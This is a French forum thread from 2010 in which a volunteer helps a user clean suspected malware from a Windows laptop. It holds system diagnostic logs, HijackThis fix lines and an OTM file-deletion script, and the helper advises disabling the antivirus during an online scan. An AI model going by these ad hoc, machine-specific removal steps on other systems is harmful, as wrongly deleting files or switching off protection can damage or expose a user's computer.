"Windows Mobile-based device management"=C:\Windows\WindowsMobile\wmdSync.exe [2006-11-02 215552]
"NvSvc"=C:\Windows\system32\nvsvc.dll [2007-09-19 86016]
"NvCplDaemon"=C:\Windows\system32\NvCpl.dll [2007-09-19 8497696]
"NvMediaCenter"=C:\Windows\system32\NvMcTray.dll [2007-09-19 81920]
"avast5"=C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe [2010-02-11 2756488]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Launcher"=C:\Windows\SMINST\launcher.exe [2006-11-07 44128]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"LightScribe Control Panel"=C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe [2007-04-19 484904]
"ehTray.exe"=C:\Windows\ehome\ehTray.exe [2008-01-19 125952]
"Skype"=C:\Program Files\Skype\Phone\Skype.exe [2009-06-26 25604904]
"WMPNSCFG"=C:\Program Files\Windows Media Player\WMPNSCFG.exe [2008-01-19 202240]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe [2009-03-05 2260480]
"Sony Ericsson PC Suite"=C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe [2009-11-20 434176]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\32868532]
C:\ProgramData\32868532\32868532.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BitComet]
C:\Program Files\BitComet\BitComet.exe /tray []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sony Ericsson PC Suite]
C:\Program Files\Sony Ericsson\Mobile2\Application Launcher\Application Launcher.exe /startoptions []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\sysgif32]
C:\Users\maman\AppData\Local\Temp\~TM50A7.tmp []

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
HP Digital Imaging Monitor.lnk - C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
Philips Gestionnaire de périphériques.lnk - C:\Program Files\Philips\SA28XX Device Manager\main.exe

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfPf]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfRd]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfSvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfUsbccidDriver]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"LogonHoursAction"=2
"DontDisplayLogonHoursWarnings"=1

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"EnableUIADesktopToggle"=0

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=255
"NoDriveAutoRun"=255
"HonorAutoRunSetting"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"BindDirectlyToPropertySetStorage"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"HonorAutoRunSetting"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*
.txt - open - C:\Windows\notepad.exe %1

======List of files/folders created in the last 1 months======

2010-02-20 23:17:36 ----RASHD---- C:\autorun.inf
2010-02-20 23:12:34 ----A---- C:\UsbFix.txt
2010-02-20 23:01:12 ----D---- C:\UsbFix
2010-02-20 20:47:06 ----D---- C:\Users\maman\AppData\Roaming\Malwarebytes
2010-02-20 20:47:01 ----D---- C:\ProgramData\Malwarebytes
2010-02-20 20:46:59 ----D---- C:\Program Files\Malwarebytes' Anti-Malware
2010-02-20 20:26:00 ----D---- C:\Program Files\trend micro
2010-02-20 20:25:59 ----D---- C:\rsit
2010-02-11 13:03:38 ----A---- C:\Windows\system32\tsbyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\quartz.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msvidc32.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msrle32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\msvfw32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\mciavi32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\iyuv_32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\avifil32.dll
2010-02-10 21:14:37 ----D---- C:\ProgramData\BVRP Software
2010-02-10 21:11:04 ----A---- C:\ProgramData\hpeA6B.dll
2010-02-10 21:10:37 ----D---- C:\ProgramData\Sony Ericsson
2010-01-24 14:24:34 ----A---- C:\Windows\system32\aswBoot.exe
2010-01-24 11:31:29 ----A---- C:\Windows\wininit.ini
2010-01-24 11:05:34 ----D---- C:\ProgramData\Spybot - Search & Destroy
2010-01-24 11:05:34 ----D---- C:\Program Files\Spybot - Search & Destroy
2010-01-24 10:39:25 ----A---- C:\Windows\system32\mshtml.dll
2010-01-24 10:39:24 ----A---- C:\Windows\system32\ieframe.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\wininet.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\urlmon.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\iertutil.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\occache.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeedsbs.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeeds.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\jsproxy.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieUnatt.exe
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieui.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iesysprep.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iepeers.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iedkcs32.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\msfeedssync.exe
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iesetup.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iernonce.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\ie4uinit.exe
2010-01-23 22:39:44 ----D---- C:\ProgramData\Alwil Software
2010-01-23 16:56:16 ----A---- C:\Windows\ntbtlog.txt
2010-01-23 08:39:56 ----D---- C:\Users\maman\AppData\Roaming\HpUpdate
2010-01-23 08:39:53 ----D---- C:\Windows\Hewlett-Packard

======List of files/folders modified in the last 1 months======

2010-02-21 00:59:55 ----D---- C:\Windows\Temp
2010-02-20 23:28:47 ----D---- C:\Windows\Prefetch
2010-02-20 23:18:39 ----D---- C:\Program Files\Mozilla Firefox
2010-02-20 23:16:28 ----SHD---- C:\$RECYCLE.BIN
2010-02-20 23:12:30 ----D---- C:\Windows\SMINST
2010-02-20 22:48:38 ----A---- C:\Windows\NeroDigital.ini
2010-02-20 22:35:27 ----D---- C:\Users\maman\AppData\Roaming\Skype
2010-02-20 22:34:55 ----D---- C:\Users\maman\AppData\Roaming\skypePM
2010-02-20 22:33:27 ----D---- C:\Windows\system32\drivers
2010-02-20 22:33:27 ----D---- C:\Windows\SchCache
2010-02-20 22:31:01 ----HD---- C:\ProgramData
2010-02-20 21:56:54 ----D---- C:\Users\maman\AppData\Roaming\FileZilla
2010-02-20 20:46:59 ----RD---- C:\Program Files
2010-02-20 11:58:32 ----SHD---- C:\System Volume Information
2010-02-20 11:49:06 ----D---- C:\ProgramData\Skyline
2010-02-20 11:35:48 ----SHD---- C:\Windows\Installer
2010-02-20 11:35:43 ----D---- C:\ProgramData\Microsoft Help
2010-02-18 18:32:08 ----D---- C:\Windows
2010-02-16 16:20:22 ----D---- C:\Windows\System32
2010-02-16 16:20:22 ----D---- C:\Windows\inf
2010-02-16 16:20:22 ----A---- C:\Windows\system32\PerfStringBackup.INI
2010-02-13 13:53:55 ----D---- C:\Windows\system32\catroot2
2010-02-11 20:20:35 ----D---- C:\Windows\winsxs
2010-02-11 20:10:25 ----D---- C:\Windows\system32\catroot
2010-02-11 20:06:25 ----D---- C:\Program Files\Windows Mail
2010-02-10 21:10:37 ----HD---- C:\Program Files\InstallShield Installation Information
2010-02-10 21:10:37 ----D---- C:\Program Files\Sony Ericsson
2010-02-01 20:26:20 ----A---- C:\Windows\system32\mrt.exe
2010-01-31 11:48:33 ----D---- C:\Windows\Tasks
2010-01-31 11:48:33 ----D---- C:\Windows\system32\Tasks
2010-01-27 20:51:18 ----D---- C:\Program Files\Internet Explorer
2010-01-24 14:25:00 ----D---- C:\Program Files\Common Files\microsoft shared
2010-01-24 14:00:28 ----D---- C:\Users\maman\AppData\Roaming\Teleca
2010-01-24 14:00:24 ----D---- C:\Windows\Downloaded Installations
2010-01-24 14:00:11 ----D---- C:\Program Files\Common Files\Teleca Shared
2010-01-24 14:00:07 ----D---- C:\Program Files\Common Files
2010-01-24 13:54:46 ----D---- C:\Windows\system32\migration
2010-01-23 22:41:00 ----D---- C:\Program Files\Alwil Software

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr.sys [2010-02-11 23376]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2010-02-11 162512]
R1 aswTdi;avast! Network Shield Support; C:\Windows\system32\drivers\aswTdi.sys [2010-02-11 46672]
R1 eabfiltr;eabfiltr; C:\Windows\system32\DRIVERS\eabfiltr.sys [2006-11-30 8192]
R1 IDSvix86;Symantec Intrusion Prevention Driver; \??\C:\PROGRA~2\Symantec\DEFINI~1\SymcData\idsdefs\20080215.002\IDSvix86.sys [2008-02-13 261680]
R1 kl1;kl1; C:\Windows\system32\DRIVERS\kl1.sys [2007-10-31 110096]
R1 SRTSPX;SRTSPX; C:\Windows\System32\Drivers\SRTSPX.SYS [2007-11-30 43696]
R1 SYMTDI;SYMTDI; C:\Windows\System32\Drivers\SYMTDI.SYS [2007-10-30 191536]
R2 aswFsBlk;aswFsBlk; C:\Windows\system32\drivers\aswFsBlk.sys [2010-02-11 19024]
R2 aswMonFlt;aswMonFlt; \??\C:\Windows\system32\drivers\aswMonFlt.sys [2010-02-11 51792]
R2 mdmxsdk;mdmxsdk; C:\Windows\system32\DRIVERS\mdmxsdk.sys [2006-06-19 12672]
R2 rimmptsk;rimmptsk; C:\Windows\system32\DRIVERS\rimmptsk.sys [2007-02-24 39936]
R2 rimsptsk;rimsptsk; C:\Windows\system32\DRIVERS\rimsptsk.sys [2007-01-23 42496]
R2 rismxdp;Ricoh xD-Picture Card Driver; C:\Windows\system32\DRIVERS\rixdptsk.sys [2007-01-23 37376]
R2 XAudio;XAudio; C:\Windows\system32\DRIVERS\xaudio.sys [2006-11-28 8192]
R3 BCM43XX;Pilote pour carte réseau Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
R3 CmBatt;Pilote pour Batterie à méthode de contrôle ACPI Microsoft; C:\Windows\system32\DRIVERS\CmBatt.sys [2008-01-19 14208]
R3 CnxtHdAudService;Conexant UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDRT32.sys [2008-03-03 188416]
R3 HBtnKey;HBtnKey; C:\Windows\system32\DRIVERS\cpqbttn.sys [2006-06-28 9472]
R3 HSF_DPV;HSF_DPV; C:\Windows\system32\DRIVERS\HSX_DPV.sys [2006-12-07 985600]
R3 HSXHWAZL;HSXHWAZL; C:\Windows\system32\DRIVERS\HSXHWAZL.sys [2006-12-07 207360]
R3 NVENETFD;NVIDIA nForce Networking Controller Driver; C:\Windows\system32\DRIVERS\nvmfdx32.sys [2007-03-07 1059112]
R3 nvlddmkm;nvlddmkm; C:\Windows\system32\DRIVERS\nvlddmkm.sys [2007-09-19 7626400]
R3 nvsmu;nvsmu; C:\Windows\system32\DRIVERS\nvsmu.sys [2007-02-17 12032]
R3 sdbus;sdbus; C:\Windows\system32\DRIVERS\sdbus.sys [2009-04-11 89088]
R3 SymEvent;SymEvent; \??\C:\Windows\system32\Drivers\SYMEVENT.SYS [2007-12-22 123952]
R3 SynTP;Synaptics TouchPad Driver; C:\Windows\system32\DRIVERS\SynTP.sys [2007-01-13 181432]
R3 usbvideo;Périphérique vidéo USB (WDM); C:\Windows\System32\Drivers\usbvideo.sys [2008-01-19 134016]
R3 winachsf;winachsf; C:\Windows\system32\DRIVERS\HSX_CNXT.sys [2006-12-07 659968]
R3 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\Windows\system32\DRIVERS\wmiacpi.sys [2008-01-19 11264]
R3 WUDFRd;WUDFRd; C:\Windows\system32\DRIVERS\WUDFRd.sys [2008-01-19 83328]
S3 BCM43XV;Pilote de la carte réseau extensible Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
S3 Dot4;Pilote MS IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4.sys [2008-01-19 131584]
S3 Dot4Print;Pilote de classe Imprimante pour IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4Prt.sys [2008-01-19 16384]
S3 dot4usb;MS Dot4USB Filter Dot4USB Filter; C:\Windows\system32\DRIVERS\dot4usb.sys [2008-01-19 36864]
S3 drmkaud;Filtre de décodeur DRM (Noyau Microsoft); C:\Windows\system32\drivers\drmkaud.sys [2008-01-19 5632]
S3 E100B;Pilote de carte Intel (R) PRO; C:\Windows\system32\DRIVERS\e100b325.sys [2006-11-02 163328]
S3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDART.sys [2007-04-12 160768]
S3 HSFHWAZL;HSFHWAZL; C:\Windows\system32\DRIVERS\VSTAZL3.SYS [2006-11-02 200704]
S3 ialm;ialm; C:\Windows\system32\DRIVERS\igdkmd32.sys [2006-10-19 1380864]
S3 MSKSSRV;Proxy de service de répartition Microsoft; C:\Windows\system32\drivers\MSKSSRV.sys [2008-01-19 8192]
S3 MSPCLOCK;Proxy d'horloge de répartition Microsoft; C:\Windows\system32\drivers\MSPCLOCK.sys [2008-01-19 5888]
S3 MSPQM;Proxy de gestion de qualité de répartition Microsoft; C:\Windows\system32\drivers\MSPQM.sys [2008-01-19 5504]
S3 MSTEE;Convertisseur en T/site-à-site de répartition Microsoft; C:\Windows\system32\drivers\MSTEE.sys [2008-01-19 6016]
S3 NAVENG;NAVENG; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVENG.SYS [2008-01-21 82256]
S3 NAVEX15;NAVEX15; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVEX15.SYS [2008-01-21 895312]
S3 s816bus;Sony Ericsson Device 816 driver (WDM); C:\Windows\system32\DRIVERS\s816bus.sys [2007-06-19 81832]
S3 s816mdfl;Sony Ericsson Device 816 USB WMC Modem Filter; C:\Windows\system32\DRIVERS\s816mdfl.sys [2007-06-19 13864]
S3 s816mdm;Sony Ericsson Device 816 USB WMC Modem Driver; C:\Windows\system32\DRIVERS\s816mdm.sys [2007-06-19 107304]
S3 s816mgmt;Sony Ericsson Device 816 USB WMC Device Management Drivers (WDM); C:\Windows\system32\DRIVERS\s816mgmt.sys [2007-06-19 99112]
S3 s816nd5;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (NDIS); C:\Windows\system32\DRIVERS\s816nd5.sys [2007-06-19 21928]
S3 s816obex;Sony Ericsson Device 816 USB WMC OBEX Interface; C:\Windows\system32\DRIVERS\s816obex.sys [2007-06-19 97320]
S3 s816unic;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (WDM); C:\Windows\system32\DRIVERS\s816unic.sys [2007-06-19 97704]
S3 SRTSP;SRTSP; C:\Windows\System32\Drivers\SRTSP.SYS [2007-11-30 279088]
S3 SRTSPL;SRTSPL; C:\Windows\System32\Drivers\SRTSPL.SYS [2007-11-30 317616]
S3 SYMDNS;SYMDNS; C:\Windows\System32\Drivers\SYMDNS.SYS [2007-10-30 12848]
S3 SYMFW;SYMFW; C:\Windows\System32\Drivers\SYMFW.SYS [2007-10-30 145968]
S3 SYMIDS;SYMIDS; C:\Windows\System32\Drivers\SYMIDS.SYS [2007-10-30 39856]
S3 SYMNDISV;SYMNDISV; C:\Windows\System32\Drivers\SYMNDISV.SYS [2007-10-30 37936]
S3 SYMREDRV;SYMREDRV; C:\Windows\System32\Drivers\SYMREDRV.SYS [2007-10-30 27696]
S3 usb_rndisx;Carte RNDIS USB; C:\Windows\system32\DRIVERS\usb8023x.sys [2009-04-11 15872]
S3 usbscan;Pilote de scanneur USB; C:\Windows\system32\DRIVERS\usbscan.sys [2008-01-19 35328]
S3 WpdUsb;WpdUsb; C:\Windows\system32\DRIVERS\wpdusb.sys [2009-10-01 40448]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 avast! Antivirus;avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R2 HP Health Check Service;HP Health Check Service; c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe [2008-06-16 94208]
R2 hpqddsvc;Service HP CUE DeviceDiscovery; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 hpqwmiex;hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [2006-05-02 135168]
R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2007-04-19 75304]
R2 Net Driver HPZ12;Net Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
R2 OMSI download service;Sony Ericsson OMSI download service; C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe [2009-04-30 90112]
R2 Pml Driver HPZ12;Pml Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
R2 RapiMgr;@%windir%\WindowsMobile\rapimgr.dll,-104; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 SBSDWSCService;SBSD Security Center Service; C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe [2009-01-26 1153368]
R2 WcesComm;@%windir%\WindowsMobile\wcescomm.dll,-40079; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 XAudioService;XAudioService; C:\Windows\system32\DRIVERS\xaudio.exe [2006-11-28 386560]
R3 avast! Mail Scanner;avast! Mail Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 avast! Web Scanner;avast! Web Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 hpqcxs08;hpqcxs08; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S2 SymAppCore;Symantec AppCore Service; c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe []
S3 Com4Qlb;Com4Qlb; C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe [2007-01-09 110592]
S3 FontCache;@%systemroot%\system32\FntCache.dll,-100; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S3 getPlusHelper;@C:\Program Files\NOS\bin\getPlus_Helper.dll,-101; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S3 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2008-11-20 136120]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2008-11-04 441712]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S3 RoxMediaDB9;RoxMediaDB9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe [2007-02-12 880640]
S3 stllssvr;stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [2007-02-17 74656]
S3 usnjsvc;Service Messenger Sharing Folders USN Journal Reader; C:\Program Files\Windows Live\Messenger\usnsvc.exe [2007-10-18 98328]
S4 CLCapSvc;CyberLink Background Capture Service (CBCS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLCapSvc.exe [2007-04-23 262243]
S4 CLSched;CyberLink Task Scheduler (CTS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLSched.exe [2007-04-23 106593]

-----------------EOF-----------------

philae
 Posté le 21/02/2010 à 14:53 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Grande Maîtresse astucienne

bonjour,

* lance hijackthis "do a system scan only" puis coche ces lignes :

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)

O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"

O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU')

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll

* clique sur FIX CHECKED

ensuite

  • Télécharge OTM (de Old_Timer) sur ton bureau,
  • Double-clique sur OTM.exe pour lancer le programme,
  • Copie la liste de fichiers ou de dossiers ci-dessous et colle-la dans la fenêtre du programme "Paste Instructions for Items to be Moved" :

Begin copying here:

:Files
C:\ProgramData\32868532\32868532.exe
c:\program files\eorezo

:Commands
[emptytemp]
[reboot]

  • Clique sur MoveIt! pour lancer la suppression,
  • Le résultat appraraîtra dans le cadre Results.
  • Clique sur Exit pour fermer le programme.
  • Poste le rapport qui est situé ici : C:\_OTM\MovedFiles
  • Il te sera peut-être demandé de redémarrer ton PC. Dans ce cas, clique sur Yes.

* fait un scan avec IE ici :

http://www.kaspersky.com/kos/eng/partner/default/pages/default/check.html?n=1259235770640

* désactive ton antivirus le temps du scan

poste le rapport ensuite

chimere06200
 Posté le 21/02/2010 à 16:41 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne

Bonjour,

voici le rapport après scan. Merci.

All processes killed
Error: Unable to interpret <Begin copying here:> in the current context!
========== FILES ==========
File/Folder C:\ProgramData\32868532\32868532.exe not found.
c:\program files\EoRezo\EoAdv\tmp folder moved successfully.
c:\program files\EoRezo\EoAdv folder moved successfully.
c:\program files\EoRezo folder moved successfully.
========== COMMANDS ==========

[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Invité
->Temp folder emptied: 12609470 bytes
->Temporary Internet Files folder emptied: 29278246 bytes
->FireFox cache emptied: 14004158 bytes

User: maman
->Temp folder emptied: 1913 bytes
->Temporary Internet Files folder emptied: 82957231 bytes
->Java cache emptied: 522719 bytes
->FireFox cache emptied: 54641016 bytes
->Google Chrome cache emptied: 6053089 bytes

User: postgres

User: postgres0

User: Public

User: tinypgsvc

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 300116 bytes
%systemroot%\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 36386 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 191,00 mb


OTM by OldTimer - Version 3.1.9.0 log created on 02212010_155944

Files moved on Reboot...
File C:\Windows\temp\_avast5_\Webshlock.txt not found!

Registry entries deleted on Reboot...

philae
 Posté le 21/02/2010 à 16:45 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Grande Maîtresse astucienne

OK

tu peux passer à la suite que j'ai donné tout à l'heure le scan en ligne

@ + tard

chimere06200
 Posté le 21/02/2010 à 17:05 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne

The program is starting. Please wait...
Updates source is selected: http://www.kaspersky.com
File download: packages/kos-extras.jar
The program is started.

Updating the anti-virus database. Please wait...
Updates source is selected: http://downloads1.kaspersky-labs.com/
File download: index/master.xml.klz
File download: bases/five/avc/kavset.xml.klz
File download: bases/five/avc/kavset.xml.klz
File download: bases/five/avc/fa001.avc
File download: bases/five/avc/basebafc.avc
File download: bases/five/avc/basebb0c.avc
File download: bases/five/avc/basebb1c.avc
File download: bases/five/avc/basebb2c.avc
File download: bases/five/avc/basebb3c.avc
File download: bases/five/avc/basebb4c.avc
File download: bases/five/avc/basebb5c.avc
File download: bases/five/avc/basebb6c.avc
File download: bases/five/avc/basebb7c.avc
File download: bases/five/avc/basebb8c.avc
File download: bases/five/avc/basebb9c.avc
File download: bases/five/avc/basebbac.avc
File download: bases/five/avc/basebbbc.avc
File download: bases/five/avc/basebbcc.avc
File download: bases/five/avc/basebbdc.avc
File download: bases/five/avc/basebbec.avc
File download: bases/five/avc/basebbfc.avc
File download: bases/five/avc/basebc0c.avc
File download: bases/five/avc/basebc1c.avc
File download: bases/five/avc/basebc2c.avc
File download: bases/five/avc/basebc3c.avc
File download: bases/five/avc/basebc4c.avc
File download: bases/five/avc/basebc5c.avc
File download: bases/five/avc/basebc6c.avc
File download: bases/five/avc/basebc7c.avc
File download: bases/five/avc/basebc8c.avc
File download: bases/five/avc/dailyc.avc
File download: bases/five/avc/ext001c.avc
File download: bases/five/avc/ext002c.avc
File download: bases/five/avc/ext003c.avc
File download: bases/five/avc/ext004c.avc
File download: bases/five/avc/ext005c.avc
File download: bases/five/avc/ext006c.avc
File download: bases/five/avc/ext007c.avc
File download: bases/five/avc/ext008c.avc
File download: bases/five/avc/ext009c.avc
File download: bases/five/avc/ext010c.avc
File download: bases/five/avc/ext011c.avc
File download: bases/five/avc/ext012c.avc
File download: bases/five/avc/ext013c.avc
File download: bases/five/avc/ext014c.avc
File download: bases/five/avc/ext015c.avc
File download: bases/five/avc/ext016c.avc
File download: bases/five/avc/ext017c.avc
File download: bases/five/avc/ext018c.avc
File download: bases/five/avc/ext019c.avc
File download: bases/five/avc/ext020c.avc
File download: bases/five/avc/ext021c.avc
File download: bases/five/avc/ext022c.avc
File download: bases/five/avc/ext023c.avc
File download: bases/five/avc/ext024c.avc
File download: bases/five/avc/ext025c.avc
File download: bases/five/avc/ext026c.avc
File download: bases/five/avc/ext027c.avc
File download: bases/five/avc/ext028c.avc
File download: bases/five/avc/ext029c.avc
File download: bases/five/avc/ext030c.avc
File download: bases/five/avc/ext031c.avc
File download: bases/five/avc/ext032c.avc
File download: bases/five/avc/ext033c.avc
File download: bases/five/avc/ext034c.avc
File download: bases/five/avc/ext035c.avc
File download: bases/five/avc/ext036c.avc
File download: bases/five/avc/ext037c.avc
File download: bases/five/avc/ext038c.avc
File download: bases/five/avc/ext039c.avc
File download: bases/five/avc/ext040c.avc
File download: bases/five/avc/ext041c.avc
File download: bases/five/avc/ext042c.avc
File download: bases/five/avc/ext043c.avc
File download: bases/five/avc/ext044c.avc
File download: bases/five/avc/ext045c.avc
File download: bases/five/avc/ext046c.avc
File download: bases/five/avc/ext047c.avc
File download: bases/five/avc/ext048c.avc
File download: bases/five/avc/ext049c.avc
File download: bases/five/avc/ext050c.avc
File download: bases/five/avc/ext051c.avc
File download: bases/five/avc/ext052c.avc
File download: bases/five/avc/ext053c.avc
